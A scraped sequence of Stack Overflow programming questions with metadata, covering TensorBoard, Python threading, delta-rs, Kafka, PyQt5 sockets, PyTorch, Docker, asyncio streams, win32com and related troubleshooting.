<p>Is blank page expected? I've expected few charts, not all charts missing because I'm running this behind corporate firewall.</p>
<p>I've been searching about this for a while and also there is <a href="https://discuss.tensorflow.org/t/how-do-i-setup-tensorboard-profiler-for-training-as-currently-is-not-working-and-not-showing-profiling-tab/7134" rel="nofollow noreferrer">https://discuss.tensorflow.org/t/how-do-i-setup-tensorboard-profiler-for-training-as-currently-is-not-working-and-not-showing-profiling-tab/7134</a> in tensorflow forum however there does not seem to be any answers.</p>
<p>Things I've tried:</p>
<ul>
<li>Profile using <code>tf.profiler.experimental.start(log path) and .stop()</code> -> Same problem</li>
</ul>
|
<python><tensorflow><deep-learning><tensorboard>
|
2023-05-22 08:18:09
| 0
| 5,008
|
haneulkim
|
76,304,096
| 6,330,106
|
Thread.join() differences between Python2.7 and Python3.x
|
<p>In a tutorial on threading.Lock, it gives an example of two threads writing the same global variable without any lock. The tutorial doesn't specify which version of Python it uses.</p>
<pre><code>import threading
num = 0
def add():
global num
for i in range(1000000):
num += 1
def desc():
global num
for i in range(1000000):
num -= 1
def main():
t1 = threading.Thread(target=add)
t2 = threading.Thread(target=desc)
t1.start()
t2.start()
t1.join()
t2.join()
print(num)
main()
</code></pre>
<p>Run the code multiple times and the results are expected to be random each time, demonstrating that it goes wrong without a lock in this case. If it's run by Python2.7, the results are indeed different. However, with Python3.x (I use Python3.10), the results are always 0.</p>
<p>As t1 and t2 are joined, the main thread is blocked until <code>add</code> and <code>desc</code> are finished. To my understanding, <code>num += 1</code> and <code>num -= 1</code> are atomic operations. I think, no matter how the two threads run, both <code>num += 1</code> and <code>num -= 1</code> are executed for 1000000 times before <code>print(num)</code>, so <code>num</code> should always be 0 at last. And I don't think it's necessary to use a Lock instance in this case. However, according to the results in Python2.7, it's not true.</p>
<p>We have a lot of scripts that run in either Python2.7 or Python3.x, so I'd like to figure it out why it behaves differently. Thanks for any help.</p>
|
<python><python-multithreading><python-3.10>
|
2023-05-22 07:59:11
| 0
| 31,575
|
ElpieKay
|
76,303,957
| 9,962,007
|
“Launch Classic Notebook” option is gone from the JupyterLab Help menu
|
<p>The deprecation of Notebook in favor of Lab is going on and since JupyterLab 4.0.0 the dependency on Notebook and with it also the useful backward compatibility option “Launch Classic Notebook” was removed from JupyterLab Help menu. Any workarounds?</p>
|
<python><jupyter-notebook><jupyter><jupyter-lab>
|
2023-05-22 07:40:35
| 1
| 7,211
|
mirekphd
|
76,303,713
| 2,000,548
|
How to add a new column when writing to a Delta table?
|
<p>I am using <a href="https://github.com/delta-io/delta-rs" rel="nofollow noreferrer">delta-rs</a> to write to a Delta table in the Delta Lake. Here is my code:</p>
<pre class="lang-py prettyprint-override"><code>import time
import numpy as np
import pandas as pd
import pyarrow as pa
from deltalake.writer import write_deltalake
num_rows = 10
timestamp = np.array([time.time() + i * 0.01 for i in range(num_rows)])
current = np.random.rand(num_rows) * 10
voltage = np.random.rand(num_rows) * 100
temperature = np.random.rand(num_rows) * 50
data = {
"timestamp": timestamp,
"current": current,
"voltage": voltage,
"temperature": temperature,
}
df = pd.DataFrame(data)
storage_options = {
"AWS_DEFAULT_REGION": "us-west-2",
"AWS_ACCESS_KEY_ID": "xxx",
"AWS_SECRET_ACCESS_KEY": "xxx",
"AWS_S3_ALLOW_UNSAFE_RENAME": "true",
}
schema = pa.schema(
[
("timestamp", pa.float64()),
("current", pa.float64()),
("voltage", pa.float64()),
("temperature", pa.float64()),
]
)
write_deltalake(
"s3a://my-bucket/delta-tables/motor",
df,
mode="append",
schema=schema,
storage_options=storage_options,
)
</code></pre>
<p>Above code successfully wrote the data including 4 columns to a Delta table. I can confirm by Spark SQL:</p>
<pre class="lang-bash prettyprint-override"><code>spark-sql> describe table delta.`s3a://my-bucket/delta-tables/motor`;
23/05/22 06:38:51 WARN ObjectStore: Failed to get database delta, returning NoSuchObjectException
timestamp double
current double
voltage double
temperature double
# Partitioning
Not partitioned
Time taken: 0.39 seconds, Fetched 7 row(s)
spark-sql> select * from delta . `s3a://my-bucket/delta-tables/motor` limit 10;
23/05/22 07:01:50 WARN ObjectStore: Failed to get database delta, returning NoSuchObjectException
1.683746477029865E9 7.604250297497938 9.421758439102415 72.1927369069416
1.683746477039865E9 0.09092487512480374 17.989035574705202 35.350210012093214
1.683746477049866E9 7.493128659573002 9.390891728445448 48.541259705334625
1.683746477059866E9 2.717780962917138 0.9268887657049119 59.10566692023579
1.683746477069866E9 2.57300442470119 17.486083607683693 47.23521355609355
1.683746477079866E9 2.09432242350117 14.945888123248054 47.125030870747715
1.683746477089866E9 4.136491853926207 16.52334128991138 27.544656909406505
1.6837464770998669E9 1.1299759566741152 5.539831633892187 52.50892511866684
1.6837464771098669E9 0.9626607062002979 8.400536671329352 72.49131313291358
1.6837464771198668E9 7.6866231204656446 4.033915109232906 48.900631068812075
Time taken: 5.925 seconds, Fetched 10 row(s)
</code></pre>
<p>Now I am trying to write to the Delta table with a new column <code>pressure</code>:</p>
<pre class="lang-py prettyprint-override"><code>import time
import numpy as np
import pandas as pd
import pyarrow as pa
from deltalake.writer import write_deltalake
num_rows = 10
timestamp = np.array([time.time() + i * 0.01 for i in range(num_rows)])
current = np.random.rand(num_rows) * 10
voltage = np.random.rand(num_rows) * 100
temperature = np.random.rand(num_rows) * 50
pressure = np.random.rand(num_rows) * 1000
data = {
"timestamp": timestamp,
"current": current,
"voltage": voltage,
"temperature": temperature,
"pressure": pressure,
}
df = pd.DataFrame(data)
storage_options = {
"AWS_DEFAULT_REGION": "us-west-2",
"AWS_ACCESS_KEY_ID": "xxx",
"AWS_SECRET_ACCESS_KEY": "xxx",
"AWS_S3_ALLOW_UNSAFE_RENAME": "true",
}
schema = pa.schema(
[
("timestamp", pa.float64()),
("current", pa.float64()),
("voltage", pa.float64()),
("temperature", pa.float64()),
("pressure", pa.float64()), # <- I added this line
]
)
write_deltalake(
"s3a://my-bucket/delta-tables/motor",
df,
mode="append",
schema=schema,
storage_options=storage_options,
overwrite_schema=True, # <- Whether add this or not will return same error
)
</code></pre>
<p>Note whether adding <code>overwrite_schema=True</code> in the function <code>write_deltalake</code> does not affect the result.</p>
<p>It will throw this error:</p>
<pre class="lang-bash prettyprint-override"><code>...
Traceback (most recent call last):
File "python3.11/site-packages/deltalake/writer.py", line 180, in write_deltalake
raise ValueError(
ValueError: Schema of data does not match table schema
Table schema:
timestamp: double
current: double
voltage: double
temperature: double
pressure: double
Data Schema:
timestamp: double
current: double
voltage: double
temperature: double
</code></pre>
<p>This error confused me. Because my existing Delta table data schema should have 4 columns. And the new data I want to write has 5 columns. But based on the error, it is opposite.</p>
<p>How can I add a new column in a Delta table? Thanks!</p>
|
<python><apache-spark><delta-lake><data-lakehouse><delta-rs>
|
2023-05-22 07:04:26
| 2
| 50,638
|
Hongbo Miao
|
76,303,698
| 1,631,414
|
How do I move to a specific offset in a Kafka consumer without running into a ValueError?
|
<p>I'm using python 3.9.16 and kafka-python version 2.0.2. I'm running on my Macbook Pro IOS 11.6.5.</p>
<p>New to Kafka and just playing around with it for now. I'm not sure what the issue is and I'm not sure why my workaround works.</p>
<p>What I'm trying to do is seek to a specific offset on the topic but I routinely run into a ValueError.</p>
<p>This is the code I have.</p>
<pre><code>from kafka import KafkaConsumer, TopicPartition
consumer = KafkaConsumer(bootstrap_servers=['localhost:9092'])
#import pdb
#pdb.set_trace()
myTP = TopicPartition('my-topic', 0)
consumer.assign([myTP])
print ("this is the consumer assignment: {}".format(consumer.assignment()))
#print ("not sure why this will work but printing position: {} ".format(consumer.position(myTP)))
consumer.seek(myTP, 22)
#print ("not sure why this will work but printing position: {} ".format(consumer.position(myTP)))
for blah in consumer:
print ("{}, {}".format(blah.offset, blah.value))
</code></pre>
<p>So most of the time when I run it, I'll get this ValueError. Once in a while it will mysteriously work without my workaround but I don't know why.</p>
<pre><code>this is the consumer assignment: {TopicPartition(topic='my-topic', partition=0)}
Traceback (most recent call last):
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 20, in _unpack
(value,) = f(data)
struct.error: unpack requires a buffer of 4 bytes
...
...
...
ValueError: Error encountered when attempting to convert value: b'' to struct format: '<built-in method unpack of _struct.Struct object at 0x10539a930>', hit error: unpack requires a buffer of 4 bytes
</code></pre>
<p>The workaround I found was if I printed the position before and after my seek command, it seems to work all the time but I don't know why. Can someone explain this to me? Do I need to build in some short delay to make this work? Does printing my position in the Consumer reset something within the Consumer which makes it work?</p>
<pre><code>$ python tkCons.py
this is the consumer assignment: {TopicPartition(topic='my-topic', partition=0)}
not sure why this will work but printing position: 34
not sure why this will work but printing position: 22
22, b'{"number": 8}'
23, b'{"number": 9}'
24, b'{"number": 0}'
25, b'{"number": 1}'
26, b'{"number": 2}'
27, b'{"number": 3}'
28, b'{"number": 4}'
29, b'{"number": 5}'
30, b'{"number": 6}'
31, b'{"number": 7}'
32, b'{"number": 8}'
33, b'{"number": 9}'
</code></pre>
<p>EDIT:
Full traceback is here:</p>
<pre><code>$ python tkCons.py
this is the consumer assignment: {TopicPartition(topic='my-topic', partition=0)}
Traceback (most recent call last):
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 20, in _unpack
(value,) = f(data)
struct.error: unpack requires a buffer of 4 bytes
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/my_secret_username/kafka/tkCons.py", line 34, in <module>
for blah in consumer:
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 1193, in __next__
return self.next_v2()
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 1201, in next_v2
return next(self._iterator)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 1116, in _message_generator_v2
record_map = self.poll(timeout_ms=timeout_ms, update_offsets=False)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 655, in poll
records = self._poll_once(remaining, max_records, update_offsets=update_offsets)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 702, in _poll_once
self._client.poll(timeout_ms=timeout_ms)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/client_async.py", line 602, in poll
self._poll(timeout / 1000)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/client_async.py", line 687, in _poll
self._pending_completion.extend(conn.recv())
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/conn.py", line 1053, in recv
responses = self._recv()
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/conn.py", line 1127, in _recv
return self._protocol.receive_bytes(recvd_data)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/parser.py", line 132, in receive_bytes
resp = self._process_response(self._rbuffer)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/parser.py", line 138, in _process_response
recv_correlation_id = Int32.decode(read_buffer)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 64, in decode
return _unpack(cls._unpack, data.read(4))
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 23, in _unpack
raise ValueError("Error encountered when attempting to convert value: "
ValueError: Error encountered when attempting to convert value: b'' to struct format: '<built-in method unpack of _struct.Struct object at 0x10539a930>', hit error: unpack requires a buffer of 4 bytes
</code></pre>
|
<python><apache-kafka><kafka-consumer-api>
|
2023-05-22 07:02:23
| 1
| 6,100
|
Classified
|
76,303,651
| 4,420,797
|
Customize accuracy graph with lines and shapes
|
<p>I wrote a simple code to construct a graph and it works fine. But,
I have no idea how I can modify it like below?
How to customize lines in matplotlib?</p>
<p><strong>Requirement:</strong></p>
<p><a href="https://i.sstatic.net/Wl9ix.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Wl9ix.png" alt="enter image description here" /></a></p>
<p><strong>My Code</strong></p>
<pre><code>import matplotlib.pyplot as plt
# Data for different models and their corresponding accuracies
models = ['10', '60', '110', '160']
accuracies = [73.2, 75.6, 77.1, 78.3]
transmix_accuracies = [74.8, 76.4, 78.2, 79.1]
# Create a figure and axis object
fig, ax = plt.subplots()
# Plot the accuracy of ViT-based models
ax.plot(models, accuracies, marker='o', label='ViT')
# Plot the accuracy of TransMix models
ax.plot(models, transmix_accuracies, marker='o', label='TransMix')
# Set the chart title and axis labels
#ax.set_title("Improvement of TransMix on ViT-based Models")
ax.set_xlabel("Number of Parameters")
ax.set_ylabel("ImageNet Top-1 Acc (%)")
# Add a legend
ax.legend()
# Show the plot
plt.show()
</code></pre>
<p><strong>Output</strong></p>
<p><a href="https://i.sstatic.net/BPjBL.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/BPjBL.png" alt="enter image description here" /></a></p>
|
<python><python-3.x><matplotlib>
|
2023-05-22 06:54:15
| 1
| 2,984
|
Khawar Islam
|
76,303,563
| 11,720,193
|
AWS Lambda import error: Unable to import module "lambda_function"
|
<p>I am trying to run a simple program in AWS Lambda. However, it is failing with <code>DEFAULT_CIPHERS</code> error. When I run the following program it <strong>fails</strong> with error <code>...unable to import lambda function</code>:</p>
<pre><code>import json
import boto3
import os
import requests
def lambda_handler(event, context):
file = '2011-02-12-0.json.gz'
download_res = requests.get(f"https://data.gharchive.org/{file}")
print(f"Files downloaded successfully - Filename: {file}")
os.environ.setdefault('AWS_PROFILE', 'myid')
s3 = boto3.client('s3')
upload_res = s3.put_object(Bucket='my-demo-bucket3', Key=file, Body=download_res.content)
print("Files Uploaded successfully")
return upload_res
</code></pre>
<p><strong>Error</strong>:</p>
<pre><code>Response
{
"errorMessage": "Unable to import module 'lambda_function': cannot import name 'DEFAULT_CIPHERS' from 'urllib3.util.ssl_' (/var/task/urllib3/util/ssl_.py)",
"errorType": "Runtime.ImportModuleError",
"requestId": "5d82baed-2ee6-41cd-a8e7-d24a59061dbc",
"stackTrace": []
}
</code></pre>
<p>Can anyone please help me sort this out.
Thanks.</p>
|
<python><amazon-web-services><aws-lambda>
|
2023-05-22 06:39:33
| 1
| 895
|
marie20
|
76,303,520
| 1,780,761
|
PyQt5 - Move QTcpServer to subprocess
|
<p>I am trying to run a QtcpServer on a different thread or even better on a subprocess in python using PyQt5.</p>
<p>Running it on a different QThread I get this error as soon as the server tries to send something to the client:</p>
<p>QObject: Cannot create children for a parent that is in a different thread.
(Parent is QNativeSocketEngine(0x295023f7c50), parent's thread is QThread(0x29501ed7e30), current thread is QThread(0x2957feaffb0)</p>
<p>After some googeling i found that I should not run a QTcpServer on a different thread. So I decided to run it as a separate subprocess, so it should have its own thread where everything is initialized and <strong>should</strong> work... at least in my own theory.. The server starts up alright, it prints out the message "listening for connections on port 2001" but I cannot connect with my client.</p>
<p>Connecting to 127.0.0.1 ...
TCP connection error :10061</p>
<p>Any help is greatly appreciated...</p>
<p>here is my code:</p>
<p>main.py:</p>
<pre><code>import sys import serverSub
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.uic import loadUi
class UiMainWindow(QMainWindow):
serverSp = serverSub.TcpSubprocess()
def __init__(self):
super(UiMainWindow, self).__init__()
self.serverSp.start_server()
self.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = UiMainWindow()
sys.exit(app.exec_())
</code></pre>
<p>serverSub.py:</p>
<pre><code>import subprocess
from PyQt5.QtCore import *
class TcpSubprocess(QObject):
# Start the server as a subprocess
p = subprocess.Popen
def start_server(self):
command = ['python', 'server2.py']
self.p = subprocess.Popen(command)
</code></pre>
<p>server2.py:</p>
<pre><code>import sys
from PyQt5.QtCore import *
from PyQt5.QtNetwork import QHostAddress, QTcpServer
class Server(QObject):
def __init__(self):
QObject.__init__(self)
self.TCP_LISTEN_TO_PORT = 2001
self.server = QTcpServer()
self.server.newConnection.connect(self.on_new_connection)
self.start_server()
self.socket = None
def __exit__(self, exc_type, exc_val, exc_tb):
print("server exited..")
def on_new_connection(self):
while self.server.hasPendingConnections():
self.set_socket(self.server.nextPendingConnection())
def start_server(self):
if self.server.listen(
QHostAddress.Any, self.TCP_LISTEN_TO_PORT
):
print("Server is listening on port: {}".format(self.TCP_LISTEN_TO_PORT))
else:
print("Server couldn't wake up")
def set_socket(self, socket):
self.socket = socket
self.socket.connected.connect(self.on_connected)
self.socket.disconnected.connect(self.on_disconnected)
self.socket.readyRead.connect(self.on_ready_read)
print("Client connected from Ip %s" % self.socket.peerAddress().toString())
def on_ready_read(self):
msg = self.socket.readAll()
msg_txt = str(msg, 'utf-8').strip()
messages = msg_txt.split("\r")
segments = messages[0].split(",")
if segments[0] == "STA":
status = int(segments[1])
# send back OK message
out = 'OK\r'
self.socket.write(bytearray(out, 'ascii'))
def on_connected(self):
print("Client connected")
def on_disconnected(self):
print("Client disconnected")
if __name__ == '__main__':
Server()
</code></pre>
|
<python><pyqt5><subprocess><qthread><qtcpserver>
|
2023-05-22 06:28:57
| 0
| 4,211
|
sharkyenergy
|
76,303,325
| 19,106,705
|
torch.nn.Parameter to nn.Module
|
<p>I want to replace the parameters inside a model with a custom nn.Module layer that I created. Below is a very simplified example of the code I desire.</p>
<p>Code:</p>
<pre class="lang-py prettyprint-override"><code>import torch
import torch.nn as nn
class change_to_layer(nn.Module):
def __init__(self):
super().__init__()
self.w = nn.Parameter(torch.randn(100, 100))
def __mul__(self, other):
return self.forward(other)
def __rmul__(self, other):
return self.forward(other)
def forward(self, x):
return x @ self.w
class simple_model(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(100, 100)
self.scale = nn.Parameter(torch.ones(1))
self.fc2 = nn.Linear(100, 100)
def forward(self, x):
x = self.fc1(x)
x = self.scale * x
x = self.fc2(x)
print(x)
model = simple_model()
model.scale = change_to_layer() # change nn.Parameter to nn.Module (error occurs)
input = torch.randn(100)
print(model(input))
</code></pre>
<p>However, I encounter the following error.</p>
<p>Error:</p>
<pre><code>---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-15-1a4295f999b1> in <cell line: 33>()
31 model = simple_model()
32
---> 33 model.scale = change_to_layer()
34
35 input = torch.randn(100)
/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py in __setattr__(self, name, value)
1633 elif params is not None and name in params:
1634 if value is not None:
-> 1635 raise TypeError("cannot assign '{}' as parameter '{}' "
1636 "(torch.nn.Parameter or None expected)"
1637 .format(torch.typename(value), name))
TypeError: cannot assign '__main__.change_to_layer' as parameter 'scale' (torch.nn.Parameter or None expected)
</code></pre>
<p>How can I change the type of a class variable?</p>
|
<python><pytorch>
|
2023-05-22 05:46:58
| 0
| 870
|
core_not_dumped
|
76,303,248
| 2,966,197
|
python streamlit sidebar resetting on entry of input
|
<p>I am creating a <code>streamlit</code> app where on the sidebar I have first a file uploader and a button. Once the file is uploaded and then the button is pressed, it shows more input option and two more buttons for user to finally sumbit. When I am at the second step, after user enters the input, it resets the sidebard to go back to step 1 and earlier hidden options go back to hidden.</p>
<p>Here is my code:</p>
<pre><code> file = st.sidebar.file_uploader('Upload',type=["pdf","txt"])
#this is step1
if file is not None:
# Save uploaded file to 'F:/tmp' folder.
save_folder = 'F:/tmp'
save_path = Path(save_folder, file.name)
with open(save_path, mode='wb') as w:
w.write(uploaded_file.getvalue())
with st.sidebar:
if save_path.exists():
st.write("File uploaded")
co1, co2= st.sidebar.columns([1, 1])
submit = co1.button("Submit", use_container_width=True)
if submit:
input1, input2, input3 = compo() # local function which sets streamlit sidebar inputs
st.sidebar.markdown("---")
c1,c2 = st.sidebar.columns([1,1])
reset = c1.button("Reset", use_container_width=True)
fin_submit = c2.button("Final Submit", use_container_width=True)
#When I enter input1 and then go click to enter input2, it resets to step 1
if reset:
placeholder = st.empty()
if fin_submit:
if file is not None:
if (input1 == "Hello") or (input2 == "There"):
placeholder.empty()
# Call processng function and display result
else:
placeholder.empty()
st.error("Sorry!")
else:
if (input1 == "You") or (input2 == "there"):
placeholder.empty()
# Call processng function and display result
else:
placeholder.empty()
st.error("Sorry!")
</code></pre>
<p>Here is the code for <code>compo()</code>:</p>
<pre><code>def compo():
c1,c2 = st.sidebar.columns(2)
input1 = c1.selectbox(label = "Input 1",options = ['Hello',"You"])
input2 = c2.selectbox(label = "Input 2", options = ["There","there"])
input3 = st.sidebar.slider("Number",min_value=1, max_value=10, value=1, step=1)
st.sidebar. markdown("---")
return input1, input2, input3
</code></pre>
<p>I don't know why as I enter a value in input1, it resets to step1</p>
|
<python><streamlit>
|
2023-05-22 05:28:04
| 1
| 3,003
|
user2966197
|
76,303,103
| 4,725,226
|
how to save a file outside the docker container with python
|
<p>So I have this structure:</p>
<p>myapp</p>
<ul>
<li>Dockerfile</li>
<li>main.py</li>
<li>req.txt</li>
</ul>
<p>this is the content of my Dockerfile:</p>
<pre><code>FROM python:3.8
ENV PYTHONDONTWRITEBYTECODE 1
ENV PYTHONUNBUFFERED 1
COPY . /app
WORKDIR /app
RUN pip3 install -r req.txt
RUN playwright install
RUN playwright install-deps
CMD ["python", "./main.py"]
</code></pre>
<p>and on my main.py, eventually, I have this code</p>
<pre><code> current_path = os.path.dirname(os.path.abspath(__file__))
result_path = os.path.join(current_path, 'result.json')
with open(result_path, 'w') as json_file:
json.dump(result, json_file, indent=4)
</code></pre>
<p>I can see that the script is running successfully, but I can't see the file that was supposed to be created in the same folder, I understand that the file is being created at</p>
<blockquote>
<p>/app/results.json</p>
</blockquote>
<p>but there's a way for this file to be created outside the container?</p>
<p>EDIT:
I have done my build with:</p>
<pre><code>docker build -t myapp .
</code></pre>
<p>and I run like this:</p>
<pre><code>docker run myapp
</code></pre>
|
<python><docker><docker-volume>
|
2023-05-22 04:47:48
| 3
| 503
|
Raul Quinzani
|
76,303,026
| 3,449,555
|
create a union of 3 files with different column headers and rows
|
<p>I have three text files with different number of rows and columns. The column names are different in each file. There are some overlapping rows and many unique rows.</p>
<p>file1.txt</p>
<pre><code>SNP CHROM POS ref alt GT info sample1 sample2 sample3 sample4 sample5
snp1 1 1 A c . PR 0/0 0/1 0/0 1/1 0/0
snp2 2 2 t a . PR 0/0 0/0 0/0 0/0 1/1
snp3 3 3 g t . PR 0/0 0/0 0/1 0/0 0/0
snp4 1 4 c g . PR 0/1 0/0 0/0 0/0 0/0
snp5 1 5 a c . PR 0/0 0/0 0/0 0/0 0/0
snp6 2 6 t a . PR 0/0 0/0 0/0 0/0 0/0
snp7 5 7 g t . PR 0/0 0/0 0/0 0/0 0/0
snp8 6 8 c g . PR 0/0 0/1 0/0 0/0 0/0
snp9 8 9 a c . PR 1/1 0/1 0/0 0/0 1/1
snp10 13 10 t a . PR 0/0 0/0 0/0 0/0 0/0
</code></pre>
<p>file2.txt</p>
<pre><code>SNP CHROM POS ref alt GT info sample6 sample7 sample8 sample9 sample10 sample11
snp1 1 1 A c . PR 0/0 0/1 0/0 1/1 0/0 0/0
snp2 2 2 t a . PR 0/0 0/0 0/0 0/0 1/1 1/1
snp4 3 3 g t . PR 0/1 0/0 0/0 0/0 0/0 0/0
snp5 1 4 c g . PR 0/0 0/0 0/0 0/0 0/0 0/0
snp7 1 5 a c . PR 0/0 0/0 0/0 0/0 0/0 0/0
snp8 2 6 t a . PR 0/0 0/1 0/0 0/0 0/0 0/0
snp10 5 7 g t . PR 0/0 0/0 0/0 0/0 0/0 0/0
snp11 6 8 c g . PR 1/1 0/1 0/0 0/0 1/1 1/1
snp12 8 9 a c . PR 1/1 0/1 0/0 0/0 1/1 1/1
snp13 13 10 t a . PR 1/1 0/1 0/0 0/0 1/1 1/1
</code></pre>
<p>file3.txt</p>
<pre><code>SNP CHROM POS ref alt GT info sample12 sample13 sample14 sample15 sample16 sample17 sample18 sample19
snp1 1 1 A c . PR 0/0 0/1 0/0 1/1 0/0 0/0 0/0 1/1
snp8 2 2 t a . PR 0/0 0/1 0/0 0/0 0/0 0/0 0/0 0/0
snp10 3 3 g t . PR 0/0 0/0 0/0 0/0 0/0 0/0 0/0 0/0
snp11 1 4 c g . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp12 1 5 a c . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp13 2 6 t a . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp14 5 7 g t . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp15 6 8 c g . PR 0/0 0/0 0/0 0/0 0/0 0/0 0/0 0/0
snp16 8 9 a c . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
snp17 13 10 t a . PR 0/0 0/0 0/0 0/0 0/0 0/0 0/0 0/0
snp18 11 11 g t . PR 1/1 0/1 0/0 0/0 1/1 1/1 0/0 0/0
</code></pre>
<p>What I want to do is: create a union of all three row names and union of all column headers from all the three files. Then I would like to fill up the column values based on three files. For example: if a row is found in file, then enter the values corresponding to that specific column header. If row is not found in file 1, then enter "./." . fill up the entire table based on the three files.
this is what I have tried so far in R:</p>
<pre><code>list(file1, file2, file3) %>%
reduce(full_join) %>%
mutate(across(everything(), replace_na, "./."))
</code></pre>
<p>However since I hvae to join 1000 columns and about 22 million rows, I run into memory issues in R. Is there an time efficient way to accomplish this in R or python or bash?</p>
|
<python><r><merge>
|
2023-05-22 04:25:26
| 0
| 309
|
biobudhan
|
76,302,926
| 507,852
|
Python 3.11 - how to detect socket closed by peer when working with Asyncio Streamers?
|
<p>I'm testing the TCP echo client example script in Python 3.11 Asyncio Streamer official document. It worked as expected, but doesn't seem to detect whether the socket is closed by peer.</p>
<p>The client side code:</p>
<pre><code>import socket
import asyncio
async def echo_client(addr,port):
r,w = await asyncio.open_connection(addr,port)
# send data normally & receive echoed back string
w.write("hello".encode())
await w.drain()
data = await r.read(100)
print("received: {}".format(data))
await asyncio.sleep(1)
# tell the server side to close socket connection
w.write("exit".encode())
await w.drain()
await asyncio.sleep(1)
# the underlying socket is already closed at this point, but
# streamer won't react unless uncommenting following 2 lines:
# w.close()
# await w.wait_closed()
# write() only send data to kernel, OK I get that
res = w.write("hello again".encode())
print(f"write: {res}")
# but why drain() neither rise except nor return any error ?
res = await w.drain()
print(f"drain: {res}")
# read() returned immediately with 0 bytes read, as expected
data = await r.read(100)
print("received: {}".format(data))
asyncio.run(echo_client("127.0.0.1",8000))
</code></pre>
<p>The server side simply echos back what's received from the connection, and will close connection (without echoing back) if received string starts with "<code>exit</code>". So in the code above, the connection is closed @line17.</p>
<p>The problem is: why the following <code>write()</code> @line26, <code>drain()</code> @line29 and <code>read()</code> @line32 neither rise any exception, nor return any error message ?</p>
<p>The result is:</p>
<pre><code>received: b'hello'
write: None
drain: None
received: b''
</code></pre>
<p>It'll only rise exception if uncommenting <code>w.close()</code> and <code>w.wait_closed()</code> so that the Streamer will only know the socket is not available anymore.</p>
<p>Yes I'm aware that I'd never know whether the socket is good or not until I interact with it, and <code>write()</code> simply sends data to kernel buffer. but I didn't expect that even <code>drain()</code> won't give any meaningful signals about the closed socket.</p>
<p>So the question is: how can I detect whether the underlying socket of Asyncio Streamer is closed by peer, other than checking the return value of <code>r.read()</code>?</p>
<p><strong>[EDIT]</strong></p>
<p>After some test I've successfully let <code>read()</code> throw exception, but the rule is quite weird. The minimal code to trigger exception is:</p>
<pre><code>import asyncio
async def echo_client(addr,port):
r,w = await asyncio.open_connection(addr,port)
w.write("exit".encode())
await w.drain()
await asyncio.sleep(1)
# socket is closed by peer at this point
w.write(b'0')
await asyncio.sleep(0.1)
w.write(b'0')
await asyncio.sleep(0.1)
# will rise BrokenPipeError
await r.read(100)
asyncio.run(echo_client("127.0.0.1",8000))
</code></pre>
<p>Call to <code>read()</code> @line16 will finally rise <code>BrokenPipeError</code>, as it supposed to be. The point is:</p>
<ol>
<li>You <em>MUST</em> call <code>write()</code> at least twice after the socket is closed by peer, and each call must write at least 1 byte of data, so that the Asyncio will finally realize that this socket is not valid anymore.</li>
<li>And you must give Asyncio sometime to deal with system error message from the 1st <code>write()</code> call, and mark the socket as broken after 2nd <code>write()</code> call.</li>
<li>For some unknown reason, <code>write()</code> will never rise exception, only <code>read()</code> and <code>drain()</code> (which will rise <code>ConnectionResetError</code>).</li>
</ol>
<p>I must say, this behavior is inconsistent and not satisfying. It make me rethinking whether it's a good idea to adopt Asyncio solution. I guess I'd better stick to low-level Transports & Protocols model, if I keep using Asyncio.</p>
|
<python><sockets><python-asyncio>
|
2023-05-22 03:46:55
| 1
| 1,982
|
RichardLiu
|
76,302,815
| 11,198,558
|
Issue when running win32com on Window 11
|
<p>I'm now running Python on Window 11 to read Excel File protected with password. the python Script is as below</p>
<pre><code> import win32com.client
file_path = '<my_file_path>'
xlApp = win32com.client.Dispatch("Excel.Application")
xlwb = xlApp.Workbooks.qOpen(file_path, False, True, None, password)
</code></pre>
<p>and the Error is</p>
<pre><code> File "S:\GitHub\ncpt_database\main_src\src_code\readManualData.py", line 29, in readingEncryptedExcel
xlwb = xlApp.Workbooks.Open(file_path, False, True, None, password)
File "C:\Users\sonnm6\.conda\envs\bidv\lib\site-packages\win32com\client\dynamic.py", line 639, in __getattr__
raise AttributeError("%s.%s" % (self._username_, attr))
AttributeError: Excel.Application.Workbooks
</code></pre>
<p>I don't know how to solve this problem. I have tried to remove the package and reinstall but it still reproduce the Error.</p>
<p>This Error on the version:</p>
<pre><code>Name Version Build Channel
pywin32 305 py39h2bbff1b_0 anaconda
pywin32-ctypes 0.2.0 py39haa95532_1000
</code></pre>
<p>Pls help!</p>
|
<python><win32com>
|
2023-05-22 03:06:26
| 1
| 981
|
ShanN
|
76,302,784
| 3,394,510
